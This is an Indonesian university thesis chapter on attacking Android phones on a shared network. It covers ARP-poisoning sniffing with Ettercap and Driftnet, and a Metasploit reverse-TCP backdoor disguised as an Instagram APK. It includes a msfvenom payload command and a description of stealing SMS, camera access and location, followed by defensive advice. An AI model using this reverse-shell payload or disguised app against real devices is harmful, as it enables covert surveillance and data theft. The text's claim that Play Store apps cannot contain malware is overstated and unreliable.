Institutional Repository | Satya Wacana Christian University: Sniffing Android dalam Satu Jaringan dengan Menggunakan Kali Linux 2.0 dan Analisis Metode Penyerangannya

BAB IV HASIL DAN ANALISIS

4.1 Implementasi

  Hasil implementasi dari percobaan penetrasi jaringan lokal yang dilakukan padapembuatan proyek kali ini dapat dilihat dari kesamaan data yang didapat oleh penyerang dan data yang sedang apada pada korban. Berikut adalah hasil karya dan hasil implementasi proyek.

4.1.1 Penyerangan dengan metode Sniffing

  Proyek yang dilakukan oleh penulis menggunakan dua cara metode penyerangan, metode pertama dengan metode Sniffing metode yang menyerang korban tanpa diketahui oleh korban, penyerang menyadap data korban hanya dengan masuk kedalam jaringan yang sama, untuk lebih jelasnya dapat disimak urutan penyerangan yang dipaparkan gambar.4.1 dam gambar 4.2. beserta penjelasannya.

  Langkah pertama dengan mencantumkan jaringan mana yang akan digunakan untuk melakukan sniffing, disini penulis menggunakan wlan0 (wireless local area

  networking dengan indek 0), biasanya pada linux adapter

  jaringan nirkabel dengan nama WLAN, dan adapter jaringan berkabel dengan nama Ether, seperti pada gambar 4.1

Gambar 4.1 Tampilan Awal Ettercap

  Langkah selanjutnya, memeindai pengguna yang ada dalam jaringan yang dimasukki korban seperti pada gambar 4.2, setelah memindai memasukkan IP gateway

  

s ebagai target pertama dan IP korban sebagai target

  kedua, selanjutnya dilakukan ARP Poisoning dengan

  

Sniff remote Connections yang memungkinkan

  penyerang dapat melakukan meneruskan koneksi korban dengan port dan IP yang digunakan seperti gambar 4.2

Gambar 4.2 Hasil memindai pengguna pada

  jaringan

  Setelah melakukan langkah pada gambar 4.2 penyerang hanya dengan memnuka terminal dan menuliskan perintah :

  Kode Program 1. Kode Program Untuk Menjalankan Drifnet

  Drifnet

  • –I wlan0

  Yang berarti memerintahkan untuk membuka aplikasi Drifnet dengan acuan adapter wlan0 untuk melakukan Sniffing seperti pada gambar 4.3, maka akan muncul dialog disebelah Terminal yang menjadi hasil

  

Sniffing yang dilakukan. Gambar tersebut bisa disimpan

pada komputer penyerang.

Gambar 4.3 Drifnet dijalanakan melalui terminal

4.1.2 Penyerangan dengan metode Backdoor

  Penyerangan pada metode ini menggunakan celah yang disebut backdoor. Dibuat dengan menggunakan metasploit yang diakses dengan terminal. Penyerang harus membuat sendiri celah yang akan ditanamkan, sesuai dengan kebutuhan port dan IP yang digunakan penyerang. Untuk langkah pertama lihat gambar 4.4

Gambar 4.4 Membuat BackdoorGambar 4.4 menunjukan proses pembuatan

  Backdoor , dengan mengetikkan perintah: Kode Program 2. Kode Program Untuk Membuat

  Backdoor Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.5.253 LPORT=4444 R> /root/instagram.apk

  Perintah tersebut memerintahkan metasploit untuk membuat backdoor dengan payload android yang menggunakan cara reserve TCP, cara ini membuat penyerang memrintahkan korban agar memanggil di port yang telah ditentukan, jika perintah itu dieksekusi sehingga memicu celah terbuka dan dapat dimasukki oleh penyerang, LHOST pada perintah di atas mengacu pada

  IP yang didapat penyerang oleh penyerang dari jaringan yang didapati dan LPORT sesuai dengan kebutuhan, jika port yang digunakan diblokir oleh admin maka harus menggunakan port yang lain, dan perintah R> menunjukan dimana letak aplikasi yang akan disusupi

backdoor , yang nantinya akan ditanam ke sistem korban.

Pada proyek kali ini aplikasi yang akan disisipi backdoor bernama “Instagram” dengan format APK.

  Setelah membuat celah yang akan ditanam dalam sistem korban langkah selanjutnya menanamkan ke dalam sistem, jika sudah tertanam maka akan tidak terlihat dan hanya bisa dilihat pada menu pengaturan aplikasi korban, penanaman hanya seperti menginstal aplikasi biasa. Lihat gambar 4.5, aplikasi yang disisipi backdoor pada langkah sebelumnya (lihat gambar 4.4) bernama instagram denganf format APK.

Gambar 4.5 Celah dalam bentuk program siap dipasang

  Setelah diinstal maka hanya dapat dilihat pada menu pengaturan Aplikasi sistem korban.

  Setelah tertanam, maka langkah selanjutnya hanya dengan metasploit yang diakses dari terminal, celah akan terpicu untuk terbuka dan penuerang bisa masuk, lihat gambar 4.6 dibawah ini.

Gambar 4.6 perintah membuka Metasploit

  Setelah tebuka, maka akan muncul pada gambar 4.7 dengan ditandai terminal masuk ke metasploit.

Gambar 4.7 Terminal masuk ke metasploit

  Jika sudah masuk, penyerang hanya memasukkan payload, lokal port, dan lokal host yang akan digunakan, lalu eksploit. Jika berhasil maka akan ada satu sesi yang terbuka. Lihat pada gambar 4.8.

Gambar 4.8 Langkah untuk memicu celah yang ditanam

  Pada gambar 4.8 menunjukan langkah memicu dalam pemicu, lalu pada baris kedua menunjukan

  payload yang digunakan, pada perintah ketiga

  menujukan Lokal host yang digunakan, dan pada perintah ke empat menunjukan lokal port yang digunakan, semua harus sama seperti pada langkah

gambar 4.4. dan pada baris terakir, adalah perintah untuk eksekusi, gambar 4.8 menunjukan celah yang dibuka

  berhasil dimasuki penyerang, ini dapat dilihat dari kata “meterpreter session 1 opended” yang berarti penyerang mendapatkan sesi untuk mengendalikan atau mencuri data.

4.2 Hasil Pengujian

  Berdasarkan implementasi proyek ini, didapati hasil pengujian yang menunjukan keberhasilan akan penyerangan terhadap suatu sistem dalam jaringan lokal, penyerang dapat menyadap gambar yang sedang korban akses dan dapat mencuri data yang ada, lihat gambar 4.9 untuk hasil kesamaan gambar yang sedang diakses korban, dan gambar 4.10 yang menunjukan kesamaan hasil data berupa SMS (Short Message Service) curian dan SMS yang ada pada perangkat korban, untuk lebih jelas lihat gambar dibawah ini.

Gambar 4.9 Kesamaan gambar yang sedang diaksesGambar 4.9 menunjukan kesamaan gambar yang diakses oleh korban melalui aplikasi Instagram, dan pemyerang

  menyadap gambar korban melalui metode sniffing seperti yang dilakukan pada poin 4.1.1, hasil yang sama ini menunjukan keberhasilan penyerang menyadap gambar korban.

Gambar 4.10 kesamaan isi SMS Kesamaan isi SMS yang dicuri oleh penyerang dan SMS yang ada pada korban menunjukan keberhasilan pencurian data yang dilakukan dengan metode backdoor, metode ini dapat melakukan beberapa kegiatan lain, seperti mengakses kamera secara langsung (streaming) tanpa diketahui oleh korban, seperti gambar 4.11.

Gambar 4.11 penyerang akses kamera korban

  Penyerang dapat melakukan beberapa kegiatan illegal lain, lihat gambar 4.12 yang menunjukan menu perusakan sistem atau pencurian data yang bisa dilakukan.

Gambar 4.12 Menu penyeranganGambar 4.12 menunjukan menu yang bisa dilakukan selain menggunakan kamera korban dan mencuri sms, penyerang

  dapat melakukan pengiriman SMS ke nomor tertentu, atau mencuri data panggilan yang dilakukan korban, atau penyerang mendapatkan lokasi dimana korban saat itu dengan menu geolocate.

4.3 Analisis Hasil Proyek

  Penyerangan yang dilakukan pada proyek ini terbilang berhasil, penyerangan dapat terjadi dengan berbagai kemungkinan, penulis mendapati analisa sebagai berikut:

  Penyerangan pertama dengan metode sniffing, berhasil seratus persen karena memang sniffing sangat susah dicegah, karena korban masuk kedalam jaringan hanya diidentifikasi sebagai pengguna biasa tanpa ada kecurigaan sebagai pengguna nakal, sniffing dilakukan dengan menggunakan cara menduplikasi

  

gateway korban pada jaringan dialihkan kepada IP penyerang,

  sehingga data yang diakses oleh korban otomatis masuk kepada penyerang, pemalsuan gateway itu dilakukan tanpa ada halangan, karena jaringan hanya memberi akses pada pengguna tanpa bisa membatasi kegiatan. Jika ada konfigurasi firewall pada router pun juga sama hasilnya, penyerang masih dapat melakukan kegiatan sniffing dengan lancar tanpa ada gangguan.

  Indikasi tersebut berarti tindakan untuk mencegah atau menghentikan sniffing hanya dengan membagi jaringan yang dipakai oleh pengguna biasa dan pengguna staff perusahaan jika itu dalam lingkup perusahaan, sehingga aman dari tindakan penyadapan dan tidak menimbulkan kecemasan akan khawatir akan disadap atau dicuri datanya. untuk penyerangan kedua dengan metode backdoor, pada prinsipnya, penyerang bisa melakukan dengan lancar selama penyerang bisa menanamkan celah ke sistem korban, jadi jika celah tidak ditanamkan, maka penyerang juga tidak bisa melakukan apa-apa terhadap sistem korban, karena sistem korban tidak ada saut pautnya dengan penyerang walau satu jaringan sekalipun. Kunci penyerangan metode backdoor hanya pada penanaman celah.

  Penyerangan dengan metode backdoor bisa dicegah dengan menggunakan program anti virus pada sistem korban, karena dalam penginstalan aplikasi terdapat sesuatu yang sekiranya membahayakan pengguna perangkat maka akan diperingatkan oleh anti virus akan bahaya jika menginstall aplikasi tersebut, jika tidak menggunakan anti virus, jangan root perangkat, karena dengan akses root akan membuat perangkat selalu menurut dengan pengguna apapun itu perintahnya, beda dengan perangkat yang belum diperbolehkan untuk hak akses root, biasanya perangkat yang belum di-root akan memiliki keraguan untuk menginstal aplikasi yang sekiranya membahayakan, ini otomatis akan membuat pengguna perangkat lebih aman, karena setiap sistem pasti memiliki model perlindungan standar yang dilakukan untuk melindungi penggunanya dari hal-hal yang tidak berkenan, paling tidak meminimalisir agar tidak terjadi sesuatu yang tidak baik.

  Selain menginstal anti virus atau tidak memberikan perangkat akses root, ada baiknya harus bijaksana dalam mengunjungi situs-situs yang ada di internet dan tidak mengunduh serta memasang sembarang aplikasi yang disediakan di internet, karena bisa mengandung sesuatu yang berbahaya, jangan mengunduh aplikasi yang kurang terpercaya dari situs bukan vendor resmi, karena terkadang aplikasi yang disediakan mengandung virus terlebih backdoor, atau pada iklan situs terkadang ada pemaksaan memasang suatu aplikasi kedalam sistem pengugnjung situs, jika tidak sengaja memasang aplikasi tersebut atau tidak tau aplikasi itu dan menurut untuk memasang aplikasi tersebut maka otomatis sistem pengguna akan membuka celah yang dapat dimasuki oleh penyerang. Karena metode penyerangan backdoor dapat dilakukan juga walau beda jaringan.

  Lebih baik mengunduh aplikasi melalui penyedia resmi yaitu Playstore, tidak mungkin aplikasi yang disediakan mengandung virus atau backdoor. Karena dalam regulasinya, pihak playstore akan menyortir terlebih dahulu aplikasi yang akan dijual, melihat kode yang ada pada aplikasi. Jika terdapat konten yang tidak baik, maka akan ditolak untuk dijual di sana. Itu berarti pengguna akan mendapatkan aplikasi yang lebih terpercaya dan aman digunakan.

Dokumen yang terkait

Institutional Repository | Satya Wacana Christian University: Aplikasi Location Based Service Rumah Makan berbasis Augmented Reality

0 0 27

Institutional Repository | Satya Wacana Christian University: Analysis of Output Dose of The Photon Beam LINAC Using TRS 398 Protocol in R.S. Ken Saras

0 0 17

BAB II DASAR TEORI - Institutional Repository | Satya Wacana Christian University: Implementasi Internet Protocol Security Menggunakan Openswan untuk Mata Kuliah Keamanan Jaringan Komputer

0 0 24

BAB III PEDOMAN PRAKTIKUM - Institutional Repository | Satya Wacana Christian University: Implementasi Internet Protocol Security Menggunakan Openswan untuk Mata Kuliah Keamanan Jaringan Komputer

0 0 9

BAB IV PENGUJIAN DAN ANALISIS - Institutional Repository | Satya Wacana Christian University: Implementasi Internet Protocol Security Menggunakan Openswan untuk Mata Kuliah Keamanan Jaringan Komputer

0 0 24

2. Peralatan yang dibutuhkan - Institutional Repository | Satya Wacana Christian University: Implementasi Internet Protocol Security Menggunakan Openswan untuk Mata Kuliah Keamanan Jaringan Komputer

0 0 20

2. Peralatan yang Dibutuhkan - Institutional Repository | Satya Wacana Christian University: Implementasi Internet Protocol Security Menggunakan Openswan untuk Mata Kuliah Keamanan Jaringan Komputer

0 0 20

2. Peralatan yang Dibutuhkan - Institutional Repository | Satya Wacana Christian University: Implementasi Internet Protocol Security Menggunakan Openswan untuk Mata Kuliah Keamanan Jaringan Komputer

0 0 12

2. Peralatan yang dibutuhkan - Institutional Repository | Satya Wacana Christian University: Implementasi Internet Protocol Security Menggunakan Openswan untuk Mata Kuliah Keamanan Jaringan Komputer

0 0 11

Institutional Repository | Satya Wacana Christian University: Membangun Jaringan Nirkabel dengan Metode Wireless Distributed System Menggunakan Access Point Mikrotik

0 0 18